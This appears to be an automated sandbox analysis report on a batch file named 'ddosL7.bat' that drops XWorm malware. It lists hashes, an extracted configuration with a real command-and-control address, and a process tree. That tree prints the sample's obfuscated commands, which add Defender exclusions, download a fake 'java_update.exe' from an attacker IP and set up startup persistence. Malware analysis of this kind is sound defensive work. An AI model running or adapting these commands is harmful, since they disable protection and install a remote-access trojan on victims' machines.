Analysis
-
max time kernel
594s -
max time network
600s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
21-06-2024 13:58
Static task
static1
General
-
Target
ddosL7.bat
-
Size
14KB
-
MD5
cf5eda10b8afb767c9aa90c2e60da074
-
SHA1
be2394dc599ca6d30b910bc96acbf5d83c09aee7
-
SHA256
35024af1d65a1a627714e6ead42382b5952f97fef015f16634a2ca4c80e58438
-
SHA512
83a6f144def80543ca523bbf0574d6e133773591b83f9ddf618f29742c92cc200a959db0e9d056ec871ee776aa9c7a0fe0294f366f65465148185e619e861faf
-
SSDEEP
96:ygDHeGfNhaenzfUP+FdRdIYAsPbPFfIYAuP1D5e1dIYAW7:PrxfnduP
Malware Config
Extracted
xworm
5.0
45.141.26.232:6666
omb7mZjvAq0auoSy
-
Install_directory
%ProgramData%
-
install_file
Java Update Checker (64 bit).exe
Signatures
-
Detect Xworm Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\java_update.exe family_xworm behavioral1/memory/3208-48-0x00000000007E0000-0x00000000007F0000-memory.dmp family_xworm -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 16 4648 powershell.exe -
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1592 powershell.exe 3888 powershell.exe 3004 powershell.exe 3016 powershell.exe 1052 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
java_update.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation java_update.exe -
Drops startup file 2 IoCs
Processes:
java_update.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update Checker (64 bit).lnk java_update.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update Checker (64 bit).lnk java_update.exe -
Executes dropped EXE 1 IoCs
Processes:
java_update.exepid process 3208 java_update.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 18 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 20 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exejava_update.exepid process 1592 powershell.exe 1592 powershell.exe 3240 powershell.exe 3240 powershell.exe 4648 powershell.exe 4648 powershell.exe 3888 powershell.exe 3888 powershell.exe 3888 powershell.exe 3004 powershell.exe 3004 powershell.exe 3004 powershell.exe 3016 powershell.exe 3016 powershell.exe 3016 powershell.exe 1052 powershell.exe 1052 powershell.exe 1052 powershell.exe 3208 java_update.exe 3208 java_update.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
Processes:
powershell.exepowershell.exepowershell.exejava_update.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1592 powershell.exe Token: SeDebugPrivilege 3240 powershell.exe Token: SeDebugPrivilege 4648 powershell.exe Token: SeDebugPrivilege 3208 java_update.exe Token: SeDebugPrivilege 3888 powershell.exe Token: SeDebugPrivilege 3004 powershell.exe Token: SeDebugPrivilege 3016 powershell.exe Token: SeDebugPrivilege 1052 powershell.exe Token: SeDebugPrivilege 3208 java_update.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
java_update.exepid process 3208 java_update.exe -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
cmd.exejava_update.exedescription pid process target process PID 3360 wrote to memory of 1592 3360 cmd.exe powershell.exe PID 3360 wrote to memory of 1592 3360 cmd.exe powershell.exe PID 3360 wrote to memory of 3240 3360 cmd.exe powershell.exe PID 3360 wrote to memory of 3240 3360 cmd.exe powershell.exe PID 3360 wrote to memory of 3856 3360 cmd.exe attrib.exe PID 3360 wrote to memory of 3856 3360 cmd.exe attrib.exe PID 3360 wrote to memory of 4648 3360 cmd.exe powershell.exe PID 3360 wrote to memory of 4648 3360 cmd.exe powershell.exe PID 3360 wrote to memory of 3208 3360 cmd.exe java_update.exe PID 3360 wrote to memory of 3208 3360 cmd.exe java_update.exe PID 3360 wrote to memory of 4000 3360 cmd.exe attrib.exe PID 3360 wrote to memory of 4000 3360 cmd.exe attrib.exe PID 3208 wrote to memory of 3888 3208 java_update.exe powershell.exe PID 3208 wrote to memory of 3888 3208 java_update.exe powershell.exe PID 3208 wrote to memory of 3004 3208 java_update.exe powershell.exe PID 3208 wrote to memory of 3004 3208 java_update.exe powershell.exe PID 3208 wrote to memory of 3016 3208 java_update.exe powershell.exe PID 3208 wrote to memory of 3016 3208 java_update.exe powershell.exe PID 3208 wrote to memory of 1052 3208 java_update.exe powershell.exe PID 3208 wrote to memory of 1052 3208 java_update.exe powershell.exe -
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
attrib.exeattrib.exepid process 3856 attrib.exe 4000 attrib.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ddosL7.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3360 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -wi"n"dow hi"d"den -command ""2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1592
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -co"m"mand "Add-MpPref"e"rence -Exclu"s"ionPath "C:\"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3240
-
-
C:\Windows\system32\attrib.exeattrib +h "Anon" /s /d2⤵
- Views/modifies file attributes
PID:3856
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowers"h"ell -Comma"n"d "Invoke-Webr"e"quest 'http://45.141.26.232/java_update.exe' -OutFile java_update.exe"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4648
-
-
C:\Users\Admin\AppData\Local\Temp\java_update.exejava_update.exe2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3208 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\java_update.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3888
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'java_update.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3004
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update Checker (64 bit).exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3016
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java Update Checker (64 bit).exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1052
-
-
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\YOKI CG\AppD"a"ta\Lo"c"al\Anon\java_update.exe /s /d2⤵
- Views/modifies file attributes
PID:4000
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3988,i,18168883380598738769,14202261231630113808,262144 --variations-seed-version --mojo-platform-channel-handle=1424 /prefetch:81⤵PID:2268
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4892,i,18168883380598738769,14202261231630113808,262144 --variations-seed-version --mojo-platform-channel-handle=1428 /prefetch:81⤵PID:3304
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
64B
MD53ca1082427d7b2cd417d7c0b7fd95e4e
SHA1b0482ff5b58ffff4f5242d77330b064190f269d3
SHA25631f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f
SHA512bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3
-
Filesize
944B
MD596ff1ee586a153b4e7ce8661cabc0442
SHA1140d4ff1840cb40601489f3826954386af612136
SHA2560673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8
SHA5123404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569
-
Filesize
1KB
MD5d2e6a56cdbc1777635f55ad1ed9d4b9d
SHA1ba66d2efd1f2b9acb35990e75be21196d56f70d5
SHA256407baadcf10890ae75e96586ad08b4f9f4d9a44e0a8bef06a969ee6297aa24b5
SHA512368f2d1a4cb5ff1841f1ae2857837f5aabd451f395e286362d8f0e4a1cc4b99192075c359b77816d57d31614bb1adcd6436c7cf5414a7de95b566143dd271603
-
Filesize
944B
MD54cb59d549e8c5d613ea4b7524088528a
SHA15bdfb9bc4920177a9e5d4b9c93df65383353ab22
SHA256a4ac74b80eadcb876402dc2842d706a249691176dd838a6100a8c26bfa87811a
SHA512a9f5bde138142665e056b1e2f40c16cff0c9a6a6907f038c4685275df66ceea39d9fca9a1c72529b2287632e0669346efb06ff302b0199764cca45b23faa4b52
-
Filesize
944B
MD5b1a1d8b05525b7b0c5babfd80488c1f2
SHA1c85bbd6b7d0143676916c20fd52720499c2bb5c6
SHA256adad192fc86c2f939fd3f70cb9ad323139a4e100f7c90b4454e2c53bdbc9b705
SHA512346c6513c1373bab58439e37d3f75de1c5c587d7eb27076cf696e885a027b3b38d70b585839d1a2e7f2270cdcf0dac8c1fdff799f3b1158242ae9e3364c2a06e
-
Filesize
944B
MD5fd98baf5a9c30d41317663898985593b
SHA1ea300b99f723d2429d75a6c40e0838bf60f17aad
SHA2569d97a5bbc88fdcceac25f293383f7e5ce242675460ffbfb2ee9090870c034e96
SHA512bf4dbbd671b5d7afb326622a7c781f150860294d3dba7160330046c258c84a15981c70e50d84dc7faaa7cc8b8c90bf8df818b3f2d3806a8a3671dfe5e38fe7b0
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
43KB
MD5f3b2776ee93cfcaafc72385378a22b31
SHA159bc68bbe3ed4936c1747b0762156d6053947562
SHA256087f7d0bf82588ecf5fa53545f7dd03cd72f3d4e729da7fd9490488ba4d42ab7
SHA51268d273eb968df3bd6f9a8740eaab5379b0d40c0bbac60dc809568f57844d0f8b2fc815535af5736b242dfef3fcda8203bb990e85311c3c46243f0c6b1934ad0d